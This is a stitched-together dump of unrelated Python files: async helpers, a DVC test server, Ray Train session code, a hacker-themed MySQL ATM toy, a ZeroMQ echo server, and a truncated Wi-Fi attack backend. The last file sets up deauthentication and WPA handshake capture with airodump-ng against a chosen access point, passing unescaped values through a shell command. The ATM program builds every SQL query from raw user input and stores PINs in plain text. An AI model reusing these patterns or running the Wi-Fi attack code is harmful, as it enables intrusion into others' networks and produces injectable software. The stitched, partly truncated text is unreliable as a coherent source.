"""Tools for working with async tasks
"""
import asyncio
import logging
import threading
from . import EOS_MARKER
log = logging.getLogger(__name__)
class AsyncThread(object):
@staticmethod
def _worker(loop):
asyncio.set_event_loop(loop)
loop.run_forever()
loop.close()
def __init__(self):
self._loop = asyncio.new_event_loop()
self._thread = threading.Thread(target=AsyncThread._worker, args=(self._loop,))
self._thread.start()
def terminate(self):
def _stop(loop):
loop.stop()
if self._loop is None:
return
self.call_soon(_stop, self._loop)
self._thread.join()
self._loop, self._thread = None, None
def __del__(self):
self.terminate()
def submit(self, func, *args, **kwargs):
"""Run async func with args/kwargs in separate thread, returns Future object."""
return asyncio.run_coroutine_threadsafe(func(*args, **kwargs), self._loop)
def call_soon(self, func, *args):
"""Call normal (non-async) function with arguments in the processing thread
it's just a wrapper over `loop.call_soon_threadsafe()`
Returns a handle with `.cancel`, not a full on Future
"""
return self._loop.call_soon_threadsafe(func, *args)
@property
def loop(self):
return self._loop
def from_queue(self, q, eos_marker=EOS_MARKER):
"""Convert qsync queue to a sync iterator,
yield items from async queue until eos_marker is observed
Queue's loop have to be the same as self.loop
"""
async def drain_q(q):
def get(q):
x = q.get_nowait()
q.task_done()
return x
return [get(q) for _ in range(q.qsize())]
while True:
xx = self.submit(drain_q, q).result()
for x in xx:
if x is eos_marker:
return
yield x
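
# Hedged usage sketch (editorial addition, not part of the original module): round-trip a few
# items through an asyncio.Queue living on the worker loop. Call _example_usage() manually;
# it is not executed on import, and it assumes the package-level EOS_MARKER is importable.
def _example_usage():
    rt = AsyncThread()

    async def make_queue():
        # The queue must be created on (and used from) the worker thread's loop.
        return asyncio.Queue()

    async def produce(q, n):
        for i in range(n):
            await q.put(i)
        await q.put(EOS_MARKER)

    q = rt.submit(make_queue).result()
    rt.submit(produce, q, 3).result()
    print(list(rt.from_queue(q)))  # expected: [0, 1, 2]
    rt.terminate()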
|
httpd.py
|
import hashlib
import os
import threading
from RangeHTTPServer import RangeRequestHandler
from dvc.utils.compat import HTTPServer
class TestRequestHandler(RangeRequestHandler):
checksum_header = None
def end_headers(self):
# RangeRequestHandler only sends Accept-Ranges header if Range header
# is present, see https://github.com/danvk/RangeHTTPServer/issues/23
if not self.headers.get("Range"):
self.send_header("Accept-Ranges", "bytes")
# Add a checksum header
if self.checksum_header:
file = self.translate_path(self.path)
if not os.path.isdir(file) and os.path.exists(file):
with open(file, "r") as fd:
encoded_text = fd.read().encode("utf8")
checksum = hashlib.md5(encoded_text).hexdigest()
self.send_header(self.checksum_header, checksum)
RangeRequestHandler.end_headers(self)
class ETagHandler(TestRequestHandler):
checksum_header = "ETag"
class ContentMD5Handler(TestRequestHandler):
checksum_header = "Content-MD5"
class StaticFileServer:
_lock = threading.Lock()
def __init__(self, handler="etag"):
self._lock.acquire()
handler_class = ETagHandler if handler == "etag" else ContentMD5Handler
self._httpd = HTTPServer(("localhost", 0), handler_class)
self._thread = None
def __enter__(self):
self._thread = threading.Thread(target=self._httpd.serve_forever)
self._thread.daemon = True
self._thread.start()
return self._httpd
def __exit__(self, *args):
self._httpd.socket.close()
self._httpd.shutdown()
self._httpd.server_close()
self._lock.release()
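# Editor's note: hedged usage sketch, not part of the original test helpers; it
# assumes the `requests` package is available and that `foo.txt` exists in the
# server's working directory.
def _static_file_server_usage_sketch():
    import requests

    with StaticFileServer(handler="etag") as httpd:
        port = httpd.server_address[1]
        response = requests.get("http://localhost:{}/foo.txt".format(port))
        # ETagHandler adds an ETag header carrying the md5 of the file contents.
        return response.headers.get("ETag")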
|
session.py
|
import os
import platform
import queue
import threading
import time
from datetime import datetime
from enum import Enum, auto
from typing import Callable
from typing import Optional, Dict
import warnings
import ray
from ray.train.constants import (
DETAILED_AUTOFILLED_KEYS, TIME_THIS_ITER_S, PID, TIMESTAMP, TIME_TOTAL_S,
NODE_IP, TRAINING_ITERATION, HOSTNAME, DATE, RESULT_FETCH_TIMEOUT)
from ray.train.utils import PropagatingThread, RayDataset
class TrainingResultType(Enum):
REPORT = auto()
CHECKPOINT = auto()
class TrainingResult():
def __init__(self, type: TrainingResultType, data: Dict):
self.type = type
self.data = data
class Session:
"""Holds information for training on each worker."""
def __init__(self,
training_func: Callable,
world_rank: int,
local_rank: int,
dataset_shard: Optional[RayDataset] = None,
checkpoint: Optional[Dict] = None,
detailed_autofilled_metrics: bool = False):
self.dataset_shard = dataset_shard
# The Thread object that is running the training function.
self.training_thread = PropagatingThread(
target=training_func, daemon=True)
self.world_rank = world_rank
self.local_rank = local_rank
self.loaded_checkpoint = checkpoint
# This lock is used to control the execution of the training thread.
self.continue_lock = threading.Semaphore(0)
# Queue for sending results across threads.
self.result_queue = queue.Queue(1)
# Autofilled metrics attributes.
self.detailed_autofilled_metrics = detailed_autofilled_metrics
self.last_report_time = time.time()
self.iteration = 0
self.time_total = 0.0
self.local_ip = self.get_current_ip()
self.ignore_report = False
self.training_started = False
def get_current_ip(self):
self.local_ip = ray.util.get_node_ip_address()
return self.local_ip
def start(self):
"""Starts the training thread."""
self.training_started = True
self.training_thread.start()
def pause_reporting(self):
"""Ignore all future ``train.report()`` calls."""
self.ignore_report = True
def finish(self):
"""Finishes the training thread.
Either returns the output from training or raises any Exception from
training.
"""
# Wait for training to finish.
# This will raise any errors that occur during training, including
# SystemError
func_output = self.training_thread.join()
# If training finished successfully, then return results.
return func_output
def get_next(self) -> Optional[TrainingResult]:
"""Gets next result from the queue."""
if not self.training_started:
raise RuntimeError("Please call start before calling get_next.")
result = None
# While training is still ongoing, attempt to get the result.
while result is None and self.training_thread.is_alive():
try:
result = self.result_queue.get(
block=True, timeout=RESULT_FETCH_TIMEOUT)
except queue.Empty:
pass
# If no result was found, then the runner must no longer be alive.
if result is None:
# Try one last time to fetch results in case results were
# reported in between the time of the last check and the
# termination of the thread runner.
try:
result = self.result_queue.get(block=False)
except queue.Empty:
pass
# Release the lock to trigger training to continue.
self.continue_lock.release()
# Return None if there are no more results to fetch.
return result
def _auto_fill_metrics(self, result: dict) -> dict:
"""Add autofilled metrics and update attributes."""
current_time = time.time()
current_datetime = datetime.now()
if TIME_THIS_ITER_S in result:
time_this_iter = result[TIME_THIS_ITER_S]
else:
time_this_iter = current_time - self.last_report_time
self.iteration += 1
self.time_total += time_this_iter
self.last_report_time = current_time
auto_filled_metrics = {
DATE: current_datetime.strftime("%Y-%m-%d_%H-%M-%S"),
TIMESTAMP: int(time.mktime(current_datetime.timetuple())),
TIME_THIS_ITER_S: time_this_iter,
TIME_TOTAL_S: self.time_total,
PID: os.getpid(),
HOSTNAME: platform.node(),
NODE_IP: self.local_ip,
TRAINING_ITERATION: self.iteration
}
if not self.detailed_autofilled_metrics:
auto_filled_metrics = {
k: v
for k, v in auto_filled_metrics.items()
if k not in DETAILED_AUTOFILLED_KEYS
}
result = result.copy()
result.update(auto_filled_metrics)
return result
def report(self, **kwargs):
"""Adds kwargs to the queue to be consumed by main thread."""
if self.ignore_report:
return
kwargs = self._auto_fill_metrics(kwargs)
result = TrainingResult(TrainingResultType.REPORT, kwargs.copy())
# Add result to a thread-safe queue.
self.result_queue.put(result, block=True)
# Acquire lock to stop the training thread until main thread
# triggers resume.
self.continue_lock.acquire()
def checkpoint(self, **kwargs):
"""Adds kwargs to the queue to be consumed by main thread.
Also stores the checkpoint in ``self.loaded_checkpoint``.
"""
# Update session checkpoint to latest checkpoint.
self.loaded_checkpoint = kwargs
# Only store checkpoints on worker with rank 0.
if self.world_rank != 0:
kwargs = {}
result = TrainingResult(TrainingResultType.CHECKPOINT, kwargs)
# Add result to a thread-safe queue.
self.result_queue.put(result, block=True)
# Acquire lock to stop the training thread until
# checkpoint has been processed.
self.continue_lock.acquire()
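# Editor's note: hedged driver-side sketch, not part of Ray Train's public API.
# It shows how get_next() pairs with Session.report()/checkpoint(): the worker
# thread blocks on ``continue_lock`` inside report(), and each get_next() call
# releases it so training can continue.
def _session_consumption_sketch(session: Session):
    session.start()
    reports = []
    while True:
        result = session.get_next()  # releasing continue_lock unblocks the worker
        if result is None:           # training thread has finished
            break
        if result.type == TrainingResultType.REPORT:
            reports.append(result.data)
    output = session.finish()
    return output, reports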
_session = None
def init_session(*args, **kwargs) -> None:
global _session
if _session:
raise ValueError("A Train session is already in use. Do not call "
"`init_session()` manually.")
_session = Session(*args, **kwargs)
def get_session() -> Session:
global _session
if _session is None or not isinstance(_session, Session):
raise ValueError("Trying to access a Train session that has not been "
"initialized yet. Train functions like "
"`train.report()` should only be called from inside "
"the training function.")
return _session
def shutdown_session():
"""Shuts down the initialized session."""
global _session
_session = None
def get_dataset_shard(
dataset_name: Optional[str] = None) -> Optional[RayDataset]:
"""Returns the Ray Dataset or DatasetPipeline shard for this worker.
You should call ``to_torch()`` or ``to_tf()`` on this shard to convert
it to the appropriate framework-specific Dataset.
.. code-block:: python
import ray
from ray import train
def train_func():
model = Net()
for iter in range(100):
data_shard = train.get_dataset_shard().to_torch()
model.train(data_shard)
return model
dataset = ray.data.read_csv("train.csv")
dataset.filter(...).repeat().random_shuffle()
trainer = Trainer(backend="torch")
trainer.start()
# Trainer will automatically handle sharding.
train_model = trainer.run(train_func, dataset=dataset)
trainer.shutdown()
Args:
dataset_name (Optional[str]): If a Dictionary of Datasets was passed to
``Trainer``, then specifies which dataset shard to return.
Returns:
The ``Dataset`` or ``DatasetPipeline`` shard to use for this worker.
If no dataset is passed into Trainer, then return None.
"""
session = get_session()
shard = session.dataset_shard
if shard is None:
warnings.warn("No dataset passed in. Returning None. Make sure to "
"pass in a Ray Dataset to Trainer.run to use this "
"function.")
elif isinstance(shard, dict):
if not dataset_name:
raise RuntimeError(
"Multiple datasets were passed into ``Trainer``, "
"but no ``dataset_name`` is passed into "
"``get_dataset_shard``. Please specify which "
"dataset shard to retrieve.")
return shard[dataset_name]
return shard
def report(**kwargs) -> None:
"""Reports all keyword arguments to Train as intermediate results.
.. code-block:: python
import time
from ray import train
def train_func():
for iter in range(100):
time.sleep(1)
train.report(hello="world")
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func)
trainer.shutdown()
Args:
**kwargs: Any key value pair to be reported by Train.
If callbacks are provided, they are executed on these
intermediate results.
"""
session = get_session()
session.report(**kwargs)
def world_rank() -> int:
"""Get the world rank of this worker.
.. code-block:: python
import time
from ray import train
def train_func():
for iter in range(100):
time.sleep(1)
if train.world_rank() == 0:
print("Worker 0")
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func)
trainer.shutdown()
"""
session = get_session()
return session.world_rank
def local_rank() -> int:
"""Get the local rank of this worker (rank of the worker on its node).
.. code-block:: python
import time
from ray import train
def train_func():
if torch.cuda.is_available():
torch.cuda.set_device(train.local_rank())
...
trainer = Trainer(backend="torch", use_gpu=True)
trainer.start()
trainer.run(train_func)
trainer.shutdown()
"""
session = get_session()
return session.local_rank
def load_checkpoint() -> Optional[Dict]:
"""Loads checkpoint data onto the worker.
.. code-block:: python
from ray import train
def train_func():
checkpoint = train.load_checkpoint()
for iter in range(checkpoint["epoch"], 5):
print(iter)
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func, checkpoint={"epoch": 3})
# 3
# 4
trainer.shutdown()
Returns:
The most recently saved checkpoint if ``train.save_checkpoint()``
has been called. Otherwise, the checkpoint that the session was
originally initialized with. ``None`` if neither exist.
"""
session = get_session()
return session.loaded_checkpoint
def save_checkpoint(**kwargs) -> None:
"""Checkpoints all keyword arguments to Train as restorable state.
.. code-block:: python
import time
from ray import train
def train_func():
for iter in range(100):
time.sleep(1)
train.save_checkpoint(epoch=iter)
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func)
trainer.shutdown()
Args:
**kwargs: Any key value pair to be checkpointed by Train.
"""
session = get_session()
session.checkpoint(**kwargs)
|
atm.py
|
import colorama
from colorama import Fore,Back
import mysql.connector as sql
import time
import sys
from os import system
import random
import threading
import itertools
'''For Connecting to your DATABASE Change below credentials and run SQL QUERIES which are at end of this code '''
while(1):
try:
LH=str(input("Enter the Host Name : "))
UN=str(input("Enter the User Name : "))
Pa=str(input("Enter the password : "))
port=str(input("Enter port Number(Default-3306) : "))
con=sql.connect(host=LH,user=UN,password=Pa,port=port)
C=con.cursor()
C.execute("show databases")
A=C.fetchall()
A=list(A)
D=0
for item in A:
if(item[0]=="apdbms"):
C.execute("use apdbms")
print("Database Selected")
time.sleep(2)
D=1
break
if(D==0):
print("You dont have the required database in your connection")
try:
C.execute("create database apdbms;")
C.execute("use apdbms")
C.execute("create table apdbms_Cust(Name varchar(20),ACCOUNT_NO int, PRIMARY KEY(ACCOUNT_NO));")
C.execute("create table apdbms_Bal(ACCOUNT_NO int , Balance int , foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);")
C.execute("create table apdbms_Acc(ACCOUNT_NO int ,PIN varchar(10), foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);")
C.execute("create table apdbms_wid(Date timestamp default current_timestamp ,ACCOUNT_NO int ,Amount int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);")
C.execute("create table apdbms_dep(Date timestamp default current_timestamp ,ACCOUNT_NO int ,Amount int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);")
C.execute("create table apdbms_tra(Date timestamp default current_timestamp ,ACCOUNT_NO int ,To_ACCOUNT int ,Amount int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);")
C.execute("create table apdbms_blo(ACCOUNT_NO int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);")
con.commit()
print("You are now connected to database ... you can start executing ")
time.sleep(2)
break
except Exception as a:
print("Some thing went Wrong ")
print("And the Error is : ",a)
break
break
except Exception as a:
print("Someting Went again")
print("And the Error is : ",a)
colorama.init(autoreset=True)
def clear():
_ = system('cls')
#For Logo
print(Fore.GREEN + '''
db db .d8b. .o88b. db dD d88888b d8888b. Cb .d8888. .d8b. d888888b .88b d88.
88 88 d8' `8b d8P Y8 88 ,8P' 88' 88 `8D `D 88' YP d8' `8b `~~88~~' 88'YbdP`88
88ooo88 88ooo88 8P 88,8P 88ooooo 88oobY' ' `8bo. 88ooo88 88 88 88 88
88~~~88 88~~~88 8b 88`8b 88~~~~~ 88`8b `Y8b. 88~~~88 88 88 88 88
88 88 88 88 Y8b d8 88 `88. 88. 88 `88. db 8D 88 88 88 88 88 88
YP YP YP YP `Y88P' YP YD Y88888P 88 YD `8888Y' YP YP YP YP YP YP
''')
print(Fore.RED + "Only a true hacker can login ... !")
print(Fore.YELLOW + "Hacker Never Quits...!")
print(
Fore.GREEN +
"<<<<====================================>>>Never Give Up<<<====================================>>>>"
)
H=0
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if H:
break
sys.stdout.write('\rH4CK!N9... ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rHere You Go ....!')
while(1):
clear()
print(''' 1. LOGIN 2.SIGNUP 3.Exit''')
fc=int(input("Enter Your Choice :"))
c=0
if(fc==1):
ACC = int(input(Fore.GREEN + "Please Enter secret Account Number :")) #Taking Account Number from user
ch="select * from apdbms_Cust where ACCOUNT_NO={}".format(ACC)
C.execute(ch)
C.fetchall()
ans=C.rowcount
ch2="select * from apdbms_acc where ACCOUNT_NO={}".format(ACC)
C.execute(ch2)
C.fetchall()
ansc=C.rowcount
ch3="select * from apdbms_Blo where ACCOUNT_NO={}".format(ACC)
C.execute(ch3)
C.fetchall()
ansc2=C.rowcount
animation = ["[■□□□□□□□□□]","[■■□□□□□□□□]", "[■■■□□□□□□□]", "[■■■■□□□□□□]", "[■■■■■□□□□□]", "[■■■■■■□□□□]", "[■■■■■■■□□□]", "[■■■■■■■■□□]", "[■■■■■■■■■□]", "[■■■■■■■■■■]"]
for i in range(10):
time.sleep(0.5)
sys.stdout.write(Fore.GREEN+"\rLogging in.... " + animation[i % len(animation)])
sys.stdout.flush()
if (ans==0):
print(Back.YELLOW+Fore.RED+"Account Not Exist's.....!")
Exit="3X7!N9.....!"
for char in Exit:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
time.sleep(0.5)
break
elif(ans ==1 and ansc== 0):
print("You Almost Done ,.... Just create a pin below to go ahead")
pin=str(input("Enter Your New PIN : "))
C.execute("insert into apdbms_acc values({},'{}');".format(ACC,pin))
con.commit()
print("Please deposit some money to your account : ",end=" ")
ubal=int(input())
C.execute("insert into apdbms_bal values({},{})".format(ACC,ubal)) #Updating Balance in Database
con.commit()
print("Your are done you can login now")
elif(ansc2==1):
print("Your Account is Temporary Blocked Contact Admin for futhur Queries")
time.sleep(3)
clear()
elif( ans ==1 and ansc==1 and ansc2!= 1):
print(Back.GREEN+Fore.RED+"H4CK3R5 B4NK W31C0M35 Y0U......!")
ch2="select PIN from apdbms_acc where ACCOUNT_NO={} ".format(ACC)
C.execute(ch2)
ans1=C.fetchone() #If Account Number exists we can login....
for i in range(3):
if(c==1):
break
print("Please Enter you MASTER P!N :",end=" ")
pas=str(input(Fore.RED)) #Taking PIN from USER
if(pas==ans1[0]): #Checking PIN is Correct or Not
while(1):
print(Fore.LIGHTYELLOW_EX+"U HACKED IT.....!")
print(Fore.GREEN+"You successfully logged in .. ! .. Here you go ... : > ")
print(Fore.BLUE+'''1.Depositing money
2.Withdrawing money
3.Transfering money
4.Checking balance
5.Changing PIN
6.View Statement
7.Log Out
''')
print('Enter Your Choice:',end=" ")
choice_login=int(input())
if(choice_login==1): #For Depositing Money
dep_money=float(input('Enter the amount u want to deposit:')) #Taking deposit Amount
C.execute("SELECT Balance from apdbms_bal where ACCOUNT_NO={}".format(ACC))
bal=C.fetchone()
bal=bal[0]
t = threading.Thread(target=animate)
t.start()
time.sleep(5)
H=1
time.sleep(1)
print("Old Balance : ",bal)
ubal=bal+dep_money #Updating Balance
print("Updated Balance :",ubal)
C.execute("UPDATE apdbms_bal set Balance={} where ACCOUNT_NO={}".format(ubal,ACC)) #Updating Balance in Database
con.commit()
C.execute("insert into apdbms_dep values(current_timestamp,{},{});".format(ACC,dep_money))
con.commit()
print('Money Deposited Successfully to your Account')
time.sleep(3)
clear()
elif(choice_login==2): #For Withdrawing Money
print("M0N3Y IS FOR EVERY ONE .. HERE Y0U C4N WITHDRAW YOUR 4M0UNT")
print('Enter Amount to Withdraw:',end=" ") #Taking Amount from user to
amt_withdraw=float(input())
print("WE HOPE YOUR PRIVACY .... Please Enter Your PIN AGAIN : " , end=" ") #Checking Intigrity by taking PIN again
pin=str(input())
ch3="select PIN from apdbms_acc where ACCOUNT_NO={} ".format(ACC) #Checking from Database
C.execute(ch3)
ans3=C.fetchone()
if(pin==ans3[0]): #Taking deposit Amount
C.execute("SELECT Balance from apdbms_bal where ACCOUNT_NO={}".format(ACC))
bal=C.fetchone()
bal=bal[0]
print(bal)
if(bal>=amt_withdraw):
ubal=bal-amt_withdraw #Updating Balance
print(ubal)
C.execute("UPDATE apdbms_bal set Balance={} where ACCOUNT_NO={}".format(ubal,ACC)) #Updating Balance in Database
con.commit()
C.execute("insert into apdbms_wid values(current_timestamp,{},{});".format(ACC,amt_withdraw))
con.commit()
print('Money Withdrawal Successful')
time.sleep(3)
clear()
else:
print("You Dont Have Sufficient Balance to with draw")
clear()
else:
print("Your are not an 37H!C41 H4CK3R ..")
Exit="3X7!N9.....!"
for char in Exit:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
time.sleep(0.5)
clear()
elif(choice_login==3): #For Transfering Money
print('Enter the Account Number you want to transfer to',end=" ")
trans_acc=int(input()) #Taking Input from USER
ch4="select * from apdbms_acc where ACCOUNT_NO={}".format(trans_acc)
C.execute(ch4)
C.fetchall()
ans4=C.rowcount
if(ans4==1):
print("Enter the Amount to transfer : ",end=" ")
trans_amount=float(input())
C.execute("SELECT Balance from apdbms_bal where ACCOUNT_NO={}".format(ACC))
bal=C.fetchone()
bal=bal[0]
if(bal>=trans_amount): #Checking Whether the user has sufficient funds or not
bal=bal-trans_amount
C.execute("SELECT Balance from apdbms_bal where ACCOUNT_NO={}".format(trans_acc))
bal1=C.fetchone()
bal1=bal1[0]
bal1=bal1+trans_amount
print(bal1)
C.execute("UPDATE apdbms_bal set Balance={} where ACCOUNT_NO={}".format(bal,ACC))
'''Transfering Balance from one account to another account'''
C.execute("UPDATE apdbms_bal set Balance={} where ACCOUNT_NO={}".format(bal1,trans_acc))
con.commit()
C.execute("insert into apdbms_tra values(current_timestamp,{},{},{});".format(ACC,trans_acc,trans_amount))
con.commit()
print('Amount transferred Successfully')
time.sleep(3)
clear()
else:
print("S0RRY .,,, Y0U D0N7 H@V3 SUFFICIENT BALANCE ...,, :~(") #Message showing if user has unsufficient Balance
time.sleep(3)
clear()
elif(choice_login==4): #Checking Balance
C.execute("SELECT Balance from apdbms_bal where ACCOUNT_NO={}".format(ACC))
bal=C.fetchone()
bal=bal[0]
print("Your Balance is",bal) #Checking Balance
time.sleep(3)
clear()
elif(choice_login==5):
print("WE HOPE YOUR PRIVACY .... Please Enter Your PIN AGAIN : " , end=" ")
pin=str(input())
ch3="select PIN from apdbms_acc where ACCOUNT_NO='{}' ".format(ACC)
C.execute(ch3)
ans3=C.fetchone()
if(pin==ans3[0]):
print("Enter your new PIN :",end=" ")
npin=str(input()) #Taking New PIN
C.execute("update apdbms_acc set PIN='{}' where ACCOUNT_NO={}".format(npin, ACC))
con.commit()
print("Pin is UPDATED")
time.sleep(3)
clear()
else:
print("U R NOT A TRUE H4CK3R .. Never come AGAIN")
clear()
elif(choice_login==6):
clear()
C.execute("select Name from apdbms_cust where ACCOUNT_NO={};".format(ACC))
NA=C.fetchall()
print(Fore.GREEN +"<<<<====================================>>>HBUCD<<<====================================>>>>")
print(Back.GREEN+Fore.RED+'''HACKERS BANK USER CONFIDENTIAL DATA ''')
print(Fore.RED+"H@CK3R :"+Fore.GREEN +"{} ".format(NA[0][0])+Fore.RED+"Account Number :"+Fore.GREEN+"{} ".format(ACC))
C.execute("select * from apdbms_wid where ACCOUNT_NO={}".format(ACC))
WIT=C.fetchall()
print("Withdraw's Table : ")
print("+--------------------------------+")
if(C.rowcount>=1):
print("| Date and Time | Amount |")
print("+--------------------------------+")
for rec in WIT:
print("|",rec[0],"|"+" "*(10-len(str(rec[1]))),rec[2],"|")
else:
print("You dont have any recent withdraws")
print("+--------------------------------+")
C.execute("select * from apdbms_dep where ACCOUNT_NO={}".format(ACC))
WID=C.fetchall()
print("Deposits's Table : ")
print("+--------------------------------+")
if(C.rowcount>=1):
print("| Date and Time | Amount |")
print("+--------------------------------+")
for rec in WID:
print("|",rec[0],"|"+" "*(10-len(str(rec[1]))),rec[2],"|")
else:
print("You dont have any recent Deposits")
print("+--------------------------------+")
C.execute("select * from apdbms_tra where ACCOUNT_NO={}".format(ACC))
TID=C.fetchall()
print("Transfer's Table : ")
print("+------------------------------------------------+")
if(C.rowcount>=1):
print("| Date and Time | Amount | Transfer to |")
print("+------------------------------------------------+")
for rec in TID:
print("|",rec[0],"|"+" "*(10-len(str(rec[1]))),rec[3],"|"," "*8,rec[2],"|")
else:
print("You dont have any recent Transfers")
print("+------------------------------------------------+")
elif(choice_login==7):
print("Thank You Visit Again.......!")
c=1
break
else:
print("Please Enter Correct Option....!")
time.sleep(2)
clear()
else:
if(i<2):
print("You Have only {} Chances left ".format(2-i))
else:
print("Maximum Number of attempts Extended ....")
C.execute("insert into apdbms_blo values({})".format(ACC))
con.commit()
time.sleep(2)
else:
print("This Account Does't Exist .. plese check correctly")
elif(fc==2):
print("H4CK3R5 B4NK W31C0M35 Y0U .... !")
print("Please Enter Your Name : ",end=" ") #Creating New User
Name=str(input())
F=1
while(F): #Creating a random 4 digit Account Number
ACC=random.randint(1000,9999)
ch="select * from apdbms_Cust where ACCOUNT_NO={}".format(ACC)
C.execute(ch)
C.fetchall()
ans=C.rowcount
if( ans !=1 ):
F=0
C.execute("insert into apdbms_Cust values('{}',{});".format(Name,ACC))
con.commit()
print("Your Account Number is {}".format(ACC))
print("Thank You For Choosing Our Bank....Login Again to choose the PIN")
time.sleep(5)
clear()
elif(fc==3):
print("Thank You Visit Again ...!")
Exit="3X7!N9.....!"
for char in Exit:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
time.sleep(0.5)
clear()
break
else:
print("Please choose correct Option")
time.sleep(2)
clear()
'''
SQL Queries for Creating Tables and Database .. simply Execute Below Queries in MySQL
create database apdbms;
use apdbms;
create table apdbms_Cust(Name varchar(20),ACCOUNT_NO int, PRIMARY KEY(ACCOUNT_NO));
create table apdbms_Bal(ACCOUNT_NO int , Balance int , foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);
create table apdbms_Acc(ACCOUNT_NO int ,PIN varchar(10), foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);
create table apdbms_wid(Date timestamp default current_timestamp ,ACCOUNT_NO int ,Amount int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);
create table apdbms_dep(Date timestamp default current_timestamp ,ACCOUNT_NO int ,Amount int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);
create table apdbms_tra(Date timestamp default current_timestamp ,ACCOUNT_NO int ,To_ACCOUNT int ,Amount int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);
create table apdbms_blo(ACCOUNT_NO int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);
'''
'''
d888888b db db .d8b. d8b db db dD db db .d88b. db db .d8888. d888888b d8888b.
`~~88~~' 88 88 d8' `8b 888o 88 88 ,8P' `8b d8' .8P Y8. 88 88 88' YP `88' 88 `8D
88 88ooo88 88ooo88 88V8o 88 88,8P `8bd8' 88 88 88 88 `8bo. 88 88oobY'
88 88~~~88 88~~~88 88 V8o88 88`8b 88 88 88 88 88 `Y8b. 88 88`8b
88 88 88 88 88 88 V888 88 `88. 88 `8b d8' 88b d88 db 8D .88. 88 `88.
YP YP YP YP YP VP V8P YP YD YP `Y88P' ~Y8888P' `8888Y' Y888888P 88 YD
'''
|
echo_server.py
|
import threading
import time
from signal import SIGINT, SIGTERM, signal
import zmq
from agents import Agent
class EchoServer(Agent):
def setup(self, name=None, address=None):
self.connection = self.bind_socket(zmq.REP, {}, address)
self.connection.observable.subscribe(self.echo)
def echo(self, xs):
self.connection.send(xs)
class Client(Agent):
def setup(self, name=None, address=None):
self.counter = 0
# receive
self.connection = self.connect_socket(zmq.REQ, {}, address)
self.connection.observable.subscribe(lambda x: self.log.info(f"received: {x}"))
# begin sending forever, add to managed threads for graceful cleanup
t = threading.Thread(target=self.send_forever)
self.threads.append(t)
t.start()
def send_forever(self):
# use exit event to gracefully exit loop and graceful cleanup
while not self.exit_event.is_set():
time.sleep(1)
self.counter += 1
multipart_message = [str(self.counter).encode()]
self.log.info(f"sending: {multipart_message}")
self.connection.send(multipart_message)
if __name__ == "__main__":
echo_server = EchoServer(name="server", address="tcp://0.0.0.0:5000")
client = Client(name="client", address="tcp://0.0.0.0:5000")
# override shutdown signals
def shutdown(signum, frame):
client.shutdown()
echo_server.shutdown()
signal(SIGTERM, shutdown)
signal(SIGINT, shutdown)
|
backend.py
|
import os
import re
import time
import threading
import subprocess
import lib.eviltwin
from lib import settings
from lib.resp import Resp
from lib.accesspoints.backend import APs
from lib.handshake.deauth import Deauthenticate
class Target:
def __init__(self, bssid, essid, chann, is_captured=False):
self.bssid = bssid
self.essid = essid
self.chann = chann
self.is_active = True
self.is_captured = is_captured
self.deauth = Deauthenticate(settings.DEAUTH_INTERFACE, bssid)
@property
def serialize(self):
return {
"bssid": self.bssid,
"essid": self.essid,
"chann": self.chann,
"isActive": self.is_active,
"isCaptured": self.is_captured,
}
class HandshakeBackend:
__target = None
__target_lock = threading.RLock()
__deauth_lock = threading.RLock()
__is_attacking = False
__airodump_process = None
__accesspoint_details = APs(
csv_file=f"{settings.HANDSHAKE_OUTPUT}-01.csv", is_single_ap=True
)
@staticmethod
def get_target():
with HandshakeBackend.__target_lock:
return HandshakeBackend.__target
@staticmethod
def remove_output_files():
n = 1
while True:
p1 = f"{settings.HANDSHAKE_OUTPUT}-{n:02}.csv"
p2 = f"{settings.HANDSHAKE_OUTPUT}-{n:02}.cap"
if not os.path.exists(p1):
break
os.remove(p1)
if os.path.exists(p2):
os.remove(p2)
n += 1
@staticmethod
def get_details():
resp = Resp()
with HandshakeBackend.__target_lock:
if not HandshakeBackend.__target:
return resp
if not HandshakeBackend.__target.is_captured:
return resp
return HandshakeBackend.__accesspoint_details.get_output()
@staticmethod
def __update_ap_info():
ap = HandshakeBackend.__accesspoint_details.get_output().serialize[
"value"
]
ap = list(ap.values())
if not len(ap):
return
ap = ap[0]
target = Target(
ap["bssid"], ap["essid"], ap["chann"], is_captured=True
)
with HandshakeBackend.__target_lock:
HandshakeBackend.__target = target
@staticmethod
def __airodump_is_active():
process = HandshakeBackend.__airodump_process
return False if not process else process.poll() is None
@staticmethod
def __start_airodump():
target = HandshakeBackend.__target
output_file = settings.HANDSHAKE_OUTPUT
interface = settings.HANDSHAKE_INTERFACE
if not target:
return
HandshakeBackend.remove_output_files()
cmd = f"airodump-ng -a --bssid {target.bssid} -c {target.chann} -w {output_file} --output-format cap,csv --ig {interface}"
HandshakeBackend.__airodump_process = subprocess.Popen(
cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.DEVNULL,
stderr=subprocess.STDOUT,
)
time.sleep(1.5)
@staticmethod
def __stop_airodump():
process = HandshakeBackend.__airodump_process
if not process or not HandshakeBackend.__airodump_is_active():
return
attempts = 10
